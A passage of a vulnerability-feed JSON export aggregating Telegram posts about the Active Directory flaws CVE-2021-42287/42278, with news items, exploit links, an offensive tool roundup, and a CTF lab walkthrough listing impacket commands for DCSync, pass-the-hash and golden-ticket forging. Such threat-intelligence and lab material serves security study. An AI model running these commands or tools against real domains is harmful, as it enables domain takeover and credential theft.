\u043b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u043d\u043e\u0439 Kingdom \u0441 
\u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Codeby.Games:\n# \u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c SID \u0434\u043e\u043c\u0435\u043d\u0430:\nimpacket-lookupsid codeby.cdb/administrator:'Not_alon3'@192.168.2.4\n\n# \u0414\u0435\u043b\u0430\u0435\u043c DCSync, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043a\u043b\u044e\u0447\u0438 \u0443\u0447\u0435\u0442\u043a\u0438 krbtgt:\nimpacket-secretsdump codeby.cdb/administrator:'Not_alon3'@192.168.2.4 -just-dc-user krbtgt\n\n# \u041e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u043c RID-\u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0430\u0440 RID+user (\u0442\u0443\u0442 \u044f \u0432\u043d\u0435\u0437\u0430\u043f\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b Pass-the-Hash):\ncrackmapexec smb 192.168.2.4 -u Administrator -H 3c3d0f466260c126a80abe255cdfffad --rid-brute\n\n# \u0412\u044b\u043f\u0443\u0441\u043a\u0430\u0435\u043c \u0437\u043e\u043b\u043e\u0442\u043e\u0439 \u0431\u0438\u043b\u0435\u0442:\nimpacket-ticketer -aesKey\nc8a4d26bcf29ff5cd29882308907b5536af9857de7cbfb4c1bf1cd789b3799d2 -domain-sid S-1-5-21-1870022127-3338747641-451296598 -domain codeby.cdb -user-id 1105 amaslova\n\n# \u0414\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u043c \u0437\u0430\u043f\u0438\u0441\u044c \u0432 /etc/hosts, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e Kerberos \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441 \u0438\u043c\u0435\u043d\u0430\u043c\u0438 \u0441\u043b\u0443\u0436\u0431:\necho '192.168.2.4 kingdom.codeby.cdb kingdom codeby.cdb' &gt;&gt; /etc/hosts\n\n# \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c smbexec \u0441 \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u043c \u0437\u043e\u043b\u043e\u0442\u044b\u043c \u0431\u0438\u043b\u0435\u0442\u043e\u043c:\nexport KRB5CCNAME=amaslova.ccache\nimpacket-smbexec 
codeby.cdb/amaslova@kingdom.codeby.cdb -k -no-pass\n\n\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u043d\u0430 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0445 \u043a \u043f\u043e\u0441\u0442\u0443 (\u043d\u0438\u0436\u0435) \u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442\u0430\u0445. \u041d\u0430 \u043f\u0435\u0440\u0432\u043e\u043c \u0438\u0437 \u043d\u0438\u0445 \u0432\u0438\u0434\u043d\u0430 \u043f\u043e\u043f\u044b\u0442\u043a\u0430 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0431\u0438\u043b\u0435\u0442 \u043d\u0430 \u043d\u0435\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0430 \u043d\u0430 \u0432\u0442\u043e\u0440\u043e\u043c \u2014 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0437\u043e\u043b\u043e\u0442\u043e\u0433\u043e \u0431\u0438\u043b\u0435\u0442\u0430, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u043b\u044f \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 amaslova!", "creation_timestamp": "2024-04-04T13:08:07.000000Z"}, {"uuid": "4a4eb245-5842-4332-a66f-846040e290ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/m1swarr1or/29", "content": "CVE-2021-42287/CVE-2021-42278: impersonate DA from standard domain user\n\n\u0441\u043a\u0430\u043d\u0435\u0440 \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u043d\u0430 
C#:\nhttps://github.com/cube0x0/noPac\n\n\u042d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u043d\u0430 python \u0434\u043b\u044f \u043a\u0430\u043b\u0438:\nhttps://github.com/WazeHell/sam-the-admin \n\n#exploit #git #pentest #redteam", "creation_timestamp": "2021-12-12T14:54:29.000000Z"}, {"uuid": "1ec943d9-a4b9-4aa0-b4ea-4632a7edcbe3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/poxek/314", "content": "#news Microsoft \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432, \u0447\u0442\u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u0434\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-42287 \u0438 CVE-2021-42278, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435\u043c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0441\u043b\u0443\u0436\u0431\u044b \u0434\u043e\u043c\u0435\u043d\u0430 Active Directory, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432 \u0441\u043e\u0432\u043e\u043a\u0443\u043f\u043d\u043e\u0441\u0442\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043b\u0435\u0433\u043a\u043e \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u0434\u043e\u043c\u0435\u043d\u044b Windows.\n\n@tomhunter", "creation_timestamp": "2021-12-22T18:21:21.000000Z"}, {"uuid": "b6ed5ae9-044e-4b04-8d2a-4432e2b40b00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/poxek/270", "content": 
"CVE-2021-42287 / CVE-2021-42278: impersonate DA from standard domain user\n\nScanner and exploit in C # :\nhttps://github.com/cube0x0/noPac\n\nPython exploit for kali : https://github.com/WazeHell/sam-the-admin\n\n@dnevnik_infosec", "creation_timestamp": "2021-12-18T15:24:11.000000Z"}, {"uuid": "7b90f8ca-9ee3-44cd-9ae6-902cd05340f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/bizone_channel/425", "content": "\u041a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0439 \u0436\u0438\u043d\u0433\u043b \u0431\u0435\u043b\u0437. \u041f\u043e\u0434\u0431\u043e\u0440\u043a\u0430 \u043d\u043e\u0432\u043e\u0441\u0442\u0435\u0439 \u0437\u0430 \u0434\u0435\u043a\u0430\u0431\u0440\u044c\ud83c\udf84\n\n\u041f\u043e\u0436\u0430\u043b\u0443\u0439, \u0441\u0430\u043c\u044b\u043c \u0433\u0440\u043e\u043c\u043a\u0438\u043c \u0438\u043d\u0444\u043e\u043f\u043e\u0432\u043e\u0434\u043e\u043c \u043c\u0435\u0441\u044f\u0446\u0430 \u0441\u0442\u0430\u043b\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell. \u041c\u044b \u0443\u0436\u0435 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u043b\u0438 \u043e \u043d\u0435\u0439, \u043a\u043e\u0433\u0434\u0430 \u0434\u0435\u043b\u0438\u043b\u0438\u0441\u044c \u0441\u0432\u043e\u0438\u043c \u0441\u043a\u0430\u043d\u0435\u0440\u043e\u043c. 
\u0422\u0435\u043f\u0435\u0440\u044c \u0445\u043e\u0442\u0438\u043c \u043e\u0441\u0432\u0435\u0442\u0438\u0442\u044c \u0441\u043e\u0431\u044b\u0442\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0432\u043b\u0435\u043a\u043b\u043e \u0435\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0434\u0440\u0443\u0433\u0438\u0435 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u0430. \n\n\ud83d\udd10Log4Shell \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u043b\u0430 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u044b\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Intel, NVIDIA \u0438 Microsoft \u2014 \u0432\u0441\u0435 \u043e\u043d\u0438 \u043f\u043e\u0432\u0441\u0435\u043c\u0435\u0441\u0442\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0432 \u0431\u0438\u0437\u043d\u0435\u0441\u0435. \u0414\u043b\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u0442\u0430\u043a\u0430\u044f \u0431\u0440\u0435\u0448\u044c \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0439 \u0437\u043e\u043b\u043e\u0442\u043e\u0439 \u0436\u0438\u043b\u043e\u0439. \u0422\u043e\u043b\u044c\u043a\u043e \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Check Point, \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u043e\u0432 \u0434\u043b\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u0436\u0435 \u043d\u0430\u0441\u0447\u0438\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0431\u043e\u043b\u0435\u0435 60, \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u0442\u0441\u044f \u0434\u043e 100 \u0430\u0442\u0430\u043a \u0432 \u043c\u0438\u043d\u0443\u0442\u0443. 
\u041a \u0442\u043e\u043c\u0443 \u0436\u0435 \u0441\u0432\u0435\u0436\u0438\u0439 \u0431\u0430\u0433 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u044b \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u0445 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043b\u044c\u0449\u0438\u043a\u043e\u0432 \u2014 Conti.\n\n\ud83d\udda5Microsoft \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043e \u0434\u0432\u0443\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445: CVE-2021-42287 \u0438 CVE-2021-42278, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043b\u0435\u0433\u043a\u043e \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0434\u043e\u043c\u0435\u043d\u0430\u043c\u0438 Windows. 
\u042d\u0442\u043e \u0434\u0430\u0435\u0442 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u0447\u0442\u0438 \u0431\u0435\u0437\u0433\u0440\u0430\u043d\u0438\u0447\u043d\u044b\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0432 \u0441\u0435\u0442\u0438.\n\n\ud83d\udea8Google \u043f\u043e\u0434\u0430\u043b\u0430 \u0432 \u0441\u0443\u0434 \u043d\u0430 \u0434\u0432\u0443\u0445 \u0440\u043e\u0441\u0441\u0438\u044f\u043d \u0437\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0431\u043e\u0442\u043d\u0435\u0442\u0430 Glupteba, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u0440\u0430\u0437\u0438\u043b \u0431\u043e\u043b\u0435\u0435 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432 \u043d\u0430 \u041e\u0421 Windows. \n\n\ud83c\udfaf\u041f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044c \u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u0434\u043b\u044f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0435\u0440\u0441\u043e\u043d\u0430\u043b\u043e\u043c Kronos \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u0441\u044f \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0435 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u041f\u041e, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432\u044b\u0432\u0435\u043b\u0430 \u0438\u0437 \u0441\u0442\u0440\u043e\u044f \u0435\u0433\u043e \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b.\n\n\ud83d\udc41\u0412\u043b\u0430\u0441\u0442\u0438 \u041f\u043e\u043b\u044c\u0448\u0438 \u0443\u043b\u0438\u0447\u0438\u043b\u0438 \u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 
\u0448\u043f\u0438\u043e\u043d\u0441\u043a\u043e\u0433\u043e \u041f\u041e Pegasus \u0434\u043b\u044f \u0441\u043b\u0435\u0436\u043a\u0438 \u0437\u0430 \u043e\u043f\u043f\u043e\u0437\u0438\u0446\u0438\u0435\u0439. \u0412\u0438\u0434\u0438\u043c\u043e, \u0434\u0430\u0436\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0440\u0430\u0437\u043e\u0431\u043b\u0430\u0447\u0435\u043d\u0438\u0439 \u043d\u0435 \u043c\u0435\u0448\u0430\u0435\u0442 NSO Group \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0442\u044c \u0441\u0432\u043e\u044e \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c.\n\n\ud83d\udd78\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0433\u043e \u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440\u0430 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 LastPass \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0442 \u043f\u0438\u0441\u044c\u043c\u0430 \u0441 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f\u043c\u0438, \u0447\u0442\u043e \u043a\u0442\u043e-\u0442\u043e \u043f\u044b\u0442\u0430\u043b\u0441\u044f \u0432\u043e\u0439\u0442\u0438 \u0432 \u0438\u0445 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u044b \u0441 \u043c\u0430\u0441\u0442\u0435\u0440-\u043f\u0430\u0440\u043e\u043b\u0435\u043c. 
\u042d\u0442\u0430 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u0447\u0430\u0441\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0438 \u0432 \u043a\u043e\u043c\u043c\u0435\u0440\u0446\u0438\u0438, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u0442\u044c \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432.\n\n\u0412\u043e\u0432\u0440\u0435\u043c\u044f \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0439\u0442\u0435 \u041f\u041e \u043d\u0430 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 \u0438 \u0431\u0443\u0434\u044c\u0442\u0435 \u043d\u0430\u0447\u0435\u043a\u0443!\n\n#securitynews", "creation_timestamp": "2021-12-29T10:52:54.000000Z"}, {"uuid": "9bb80e80-e09b-4bda-a16a-4825ac95e36d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/arpsyndicate/1198", "content": "#ExploitObserverAlert\n\nCVE-2021-42287\n\nDESCRIPTION: Exploit Observer has 108 entries related to CVE-2021-42287. 
Active Directory Domain Services Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-42278, CVE-2021-42282, CVE-2021-42291.\n\nFIRST-EPSS: 0.928080000\nNVD-IS: 5.9\nNVD-ES: 2.8", "creation_timestamp": "2023-12-04T12:00:54.000000Z"}, {"uuid": "aa128fc7-8be3-4946-aff1-5d6d377ac962", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/anwar1213xx/1565", "content": "\u062a\u062d\u0630\u0631 Microsoft \u0645\u0646 \u0623\u0646 \u0627\u062b\u0646\u064a\u0646 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u062a\u064a \u062a\u0645 \u0627\u0644\u0625\u0628\u0644\u0627\u063a \u0639\u0646\u0647\u0627 \u0645\u0624\u062e\u0631\u064b\u0627 - \u062a\u0645 \u062a\u0639\u0642\u0628\u0647\u0645\u0627 \u0643\u0640 CVE-2021-42278 \u0648 CVE-2021-42287 - \u0641\u064a Active Directory \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0645\u0627 \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0644\u0644\u0627\u0633\u062a\u064a\u0644\u0627\u0621 \u0639\u0644\u0649 \u0648\u062d\u062f\u0627\u062a \u062a\u062d\u0643\u0645 \u0645\u062c\u0627\u0644 Windows \u063a\u064a\u0631 \u0627\u0644\u0645\u0635\u062d\u062d\u0629.\n\n\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T09:37:34.000000Z"}, {"uuid": "58ed00f9-7095-4a6d-87cc-2c27413996d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/arpsyndicate/231", "content": "#ExploitObserverAlert\n\nCVE-2021-42287\n\nDESCRIPTION: Exploit Observer has 104 entries related to CVE-2021-42287. 
Active Directory Domain Services Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-42278, CVE-2021-42282, CVE-2021-42291.\n\nFIRST-EPSS: 0.926130000\nNVD-IS: 5.9\nNVD-ES: 2.8", "creation_timestamp": "2023-11-17T07:24:39.000000Z"}, {"uuid": "fa43658e-5055-4f88-a829-a859f041f694", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/piratesofyemen1213/236", "content": "\u062a\u062d\u0630\u0631 Microsoft \u0645\u0646 \u0623\u0646 \u0627\u062b\u0646\u064a\u0646 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u062a\u064a \u062a\u0645 \u0627\u0644\u0625\u0628\u0644\u0627\u063a \u0639\u0646\u0647\u0627 \u0645\u0624\u062e\u0631\u064b\u0627 - \u062a\u0645 \u062a\u0639\u0642\u0628\u0647\u0645\u0627 \u0643\u0640 CVE-2021-42278 \u0648 CVE-2021-42287 - \u0641\u064a Active Directory \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0645\u0627 \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0644\u0644\u0627\u0633\u062a\u064a\u0644\u0627\u0621 \u0639\u0644\u0649 \u0648\u062d\u062f\u0627\u062a \u062a\u062d\u0643\u0645 \u0645\u062c\u0627\u0644 Windows \u063a\u064a\u0631 \u0627\u0644\u0645\u0635\u062d\u062d\u0629.\n\n\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T09:37:19.000000Z"}, {"uuid": "2e73bf48-3db2-4191-bc42-8744161d26fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/GhostClanOfficial/301", "content": "#Tools -\u00a0 \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 
\ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\n\nConnect\n\nCommand and Control Framework\n\nhttps://github.com/skylerknecht/connect\n\nPackMyPayload\n\nEmerging Threat of Containerized Malware\n\nThis tool takes a file or directory on input and embeds them into an output file acting as an archive/container. It can serve purpose for a Proof-of-Concept presenting emerging risk of container file formats with embedded malware, as well as helper for professional Red Team Operators to sharpen their Initial Access maneuvers.\n\nCurrently Threat Actors are known to smuggle their malware archived in various container file formats, to name a few:\n\n\u25ab\ufe0f 7zip\n\u25ab\ufe0f zip\n\u25ab\ufe0f ISO\n\u25ab\ufe0f IMG\n\nThey do that to get their payloads pass file content scanners, but more importantly to avoid having Mark-Of-The-Web flag on their files. There're various motives on why adversaries don't want MOTW on their files: Protected View in Microsoft Office was always among them.\n\nShould they provide container file to their victims, a foundation for disabling VBA macros in Internet-originated Office documents might be bypassed.\n\nhttps://github.com/mgeeky/PackMyPayload\n\nScoutSuite\n\nScout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. Using the APIs exposed by cloud providers, \n\nScout Suite gathers configuration data for manual inspection and highlights risk areas. Rather than going through dozens of pages on the web consoles, Scout Suite presents a clear view of the attack surface automatically.\n\n\u25ab\ufe0f https://github.com/nccgroup/ScoutSuite\n\u25ab\ufe0f https://github.com/nccgroup/sadcloud\n\nMsSettingsDelegateExecute\n\nBypass UAC on Windows 10/11 x64 using ms-settings DelegateExecute registry key. 
This visual studio project will compile a static x64 binary to test this issue.\n\nhttps://github.com/hackerhouse-opensource/MsSettingsDelegateExecute\n\niscsicpl_bypassUAC\n\nUAC bypass for x64 Windows 7-11\n\nhttps://github.com/zha0gongz1/iscsicpl_bypassUAC\n\nPico-PIO-USB.\n\nUSB host/device implementation using PIO of raspberry pi pico (RP2040).\n\nhttps://github.com/sekigon-gonnoc/Pico-PIO-USB\n\nserver-status PWN\n\nA script that monitors and extracts requested URLs and clients connected to the service by exploiting publicly accessible Apache server-status instances.\n\nhttps://github.com/mazen160/server-status_PWN\n\nExploiting Misconfigured Apache server-status Instances with server-status_PWN:\nhttps://mazinahmed.net/blog/exploiting-misconfigured-apache-server-status-instances/\n\nChitchatter\n\nA free (as in both price and freedom) communication tool. It is designed with security and privacy in mind.\n\nhttps://github.com/jeremyckahn/chitchatter\n\nDemo:\nhttps://chitchatter.im/\n\nSwiss Cyber Defence\n\nExam Preparation for Cyber Security Specialist with Swiss Federal Diploma.\n\nhttps://github.com/phr85/swiss-cyber-defence\n\nnoPac\n\nExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user\n\nhttps://github.com/Ridter/noPac\n\n#cve #exploit\n\nFsociety\n\nA Modular Penetration Testing Framework.\n\nhttps://github.com/fsociety-team/fsociety\n\nLORSRF\n\nlorsrf is just a web pen-testing tool that I wrote to find the parameters that can be used to find SSRF or Out-of-band resource load by adding OAST host like Burp Collaborator to the parameter value, above of all, the request that will be received in Burp Collaborator will be an HTTP request without any real pieces of information about the target, i was thinking about how can i get vulnerable parameter/endpoint , Hence i made a simple feature is that allowed you to add some pieces of information of the target in your OAST host as a 
variables\n\nhttps://github.com/knassar702/lorsrf\n\nEval 2 Term\n\nhttps://github.com/She11Way/eval2term\n\nJoin:\nhttps://t.me/dilagrafie\nhttps://t.me/HackerFactory\n\nWebsite:\nwww.ghostclan.org\n\n#InsoSec #cybersec \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06", "creation_timestamp": "2023-03-22T10:44:27.000000Z"}, {"uuid": "437cb85a-f008-4564-bbd9-db5a2e9d090e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/arpsyndicate/1557", "content": "#ExploitObserverAlert\n\nCVE-2021-42287\n\nDESCRIPTION: Exploit Observer has 107 entries related to CVE-2021-42287. Active Directory Domain Services Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-42278, CVE-2021-42282, CVE-2021-42291.\n\nFIRST-EPSS: 0.924660000\nNVD-IS: 5.9\nNVD-ES: 2.8", "creation_timestamp": "2023-12-08T12:18:23.000000Z"}, {"uuid": "ec3c388a-dbc1-4c39-8c07-90552019b85a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/piratesofyemen/398", "content": "\u062a\u062d\u0630\u0631 Microsoft \u0645\u0646 \u0623\u0646 \u0627\u062b\u0646\u064a\u0646 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u062a\u064a \u062a\u0645 \u0627\u0644\u0625\u0628\u0644\u0627\u063a \u0639\u0646\u0647\u0627 \u0645\u0624\u062e\u0631\u064b\u0627 - \u062a\u0645 \u062a\u0639\u0642\u0628\u0647\u0645\u0627 \u0643\u0640 